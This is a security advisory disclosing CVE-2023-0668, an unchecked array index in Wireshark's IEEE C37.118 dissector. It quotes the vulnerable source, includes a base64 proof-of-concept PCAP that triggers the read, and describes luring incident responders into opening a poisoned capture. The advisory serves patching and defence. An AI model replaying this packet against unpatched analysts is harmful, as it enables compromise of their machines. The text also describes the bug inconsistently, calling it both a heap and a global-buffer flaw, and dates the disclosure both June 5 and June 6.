Austin Hackers Anonymous

About Us Chat CVE Mailing List Meetings Our Spawn Rules

CVE-2023-0668: Wireshark IEEE-C37.118 parsing buffer overflow

AHA! has discovered an issue with Wireshark from The Wireshark Foundation, and is issuing this disclosure in accordance with AHA!’s standard disclosure policy today, on Monday, June 5, 2023. CVE-2023-0668 has been assigned to this issue.

Executive Summary

Due to failure in validating the length provided by an attacker-crafted IEEE-C37.118 packet, Wireshark version 4.0.5 and prior, by default, is susceptible to a heap-based buffer overflow, and possibly code execution in the context of the process running Wireshark. CVE-2023-0668 appears to be an instance of CWE-125.

Technical Details

This crash is caused by an out of bounds read from the global buffer conf_phasor_type

** Note the below array contains 17 items

wireshark/epan/dissectors/packet-synphasor.c

static const value_string conf_phasor_type[] = {               
       { 0, "Voltage, Zero sequence"           },
       { 1, "Voltage, Positive sequence"       },
       { 2, "Voltage, Negative sequence"       },
       { 3, "Voltage, Reserved"                },                
       { 4, "Voltage, Phase A"                 },                
       { 5, "Voltage, Phase B"                 },
       { 6, "Voltage, Phase C"                 },
       { 7, "Voltage, Reserved"                },
       { 8, "Current, Zero sequence"           },
       { 9, "Current, Positive sequence"       },
       { 10, "Current, Negative sequence"      },
       { 11, "Current, Reserved"               },
       { 12, "Current, Phase A"                },
       { 13, "Current, Phase B"                },
       { 14, "Current, Phase C"                },
       { 15, "Current, Reserved"               },
       {  0, NULL                              }
};

In dissect_PHSCALE (which can be found in the top frame of the stack trace.) on line 1214, the tvb_get_guint8 function is used to retrieve 1 byte from the synphasor packet payload, and then uses that value as an index into the conf_phasor_type array without performing any bounds checks.

wireshark/epan/dissectors/packet-synphasor.c

static gint dissect_PHSCALE(tvbuff_t *tvb, proto_tree *tree, gint offset, gint cnt)
{       
       proto_tree *temp_tree;
       gint i;

       if (0 == cnt) {
               return offset;
       }

       temp_tree = proto_tree_add_subtree_format(tree, tvb, offset, 12 * cnt, ett_conf_phconv, NULL,
                                                 "Phasor scaling and data flags (%u)", cnt);
       
       for (i = 0; i < cnt; i++) {
               proto_tree *single_phasor_scaling_and_flags_tree;
               proto_tree *phasor_flag1_tree;
               proto_tree *phasor_flag2_tree;
               proto_tree *data_flag_tree;

               single_phasor_scaling_and_flags_tree = proto_tree_add_subtree_format(temp_tree, tvb, offset, 12,
                                                                                    ett_conf_phlist, NULL,
                                                                                    "Phasor #%u", i + 1);
       
               data_flag_tree = proto_tree_add_subtree_format(single_phasor_scaling_and_flags_tree, tvb, offset, 4,
                                                              ett_conf_phflags, NULL, "Phasor Data flags: %s",
                                                              conf_phasor_type[tvb_get_guint8(tvb, offset + 2)].strptr);
       
               /* first and second bytes - phasor modification flags*/
               phasor_flag1_tree = proto_tree_add_subtree_format(data_flag_tree, tvb, offset, 2, ett_conf_phmod_flags,
                                                                 NULL, "Modification Flags: 0x%04x",
                                                                 tvb_get_ntohs(tvb, offset));
       

A Base64 encoded blob of an example PCAP that can trigger the issue is below.

1MOyoQIABAAAAAAAAAAAAP9/AAD8AAAAAAAAAAAAAAAdAQAAHQEAAAAOAAh1ZHAuc
G9ydAAgAAQAABJpAAAAAKpZAKpZAAIAAADxQgAUAAAAAQAAAAIALAAAAAAAAAAAAA
9CQP8vAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAgAsAAAAAAAAAAA
AD0JA/y8AAAAAAAAAAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC4rAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAA
BRQkgUAAD3EwD/AAAAAAAAAAAAIQAAABERAQD///8AAA==

Attacker Value

By providing this poisoned IEEE C37.118 packet, an attacker could hijack the user account of an analyst running Wireshark. Many security appliances capture packets as a matter of course for later analysis, and Wireshark is a common tool used by incident responders. So, it would be trivial for an attacker to intentionally “get caught” in order to provide their malicious packet to an incident response analyst. Once compromised, this can provide an attacker a unique, privileged position in the targeted network.

Credit

This issue is being disclosed through the AHA! CNA and is credited to: zenofex and WanderingGlitch

Timeline

Note, while we expected to publicly disclose this issue in early July (60 days after disclosure to The Wireshark Foundation), the vendor publicized the issue on May 22nd in issue 19087.

2023-04-27 (Wed): Initial findings presented at the regularly scheduled meeting 0x00c7.
2023-05-17 (Wed): PoC validated and analysis completed for disclosure.
2023-05-18 (Thu): Disclosed to the vendor via email at [email protected].
2023-05-18 (Thu): Vendor acknowledged, and opened issue 19087 to address.
2023-05-21 (Sun): Patch merged to the release-3.6 and release-4.0 branches of Wireshark.
2023-05-22 (Mon): Issue 19087 made public by the vendor.
2023-05-24 (Wed): CVE-2023-0668 fixed in Wireshark version 4.0.6
2023-06-06 (Tue): Public disclosure of CVE-2023-0668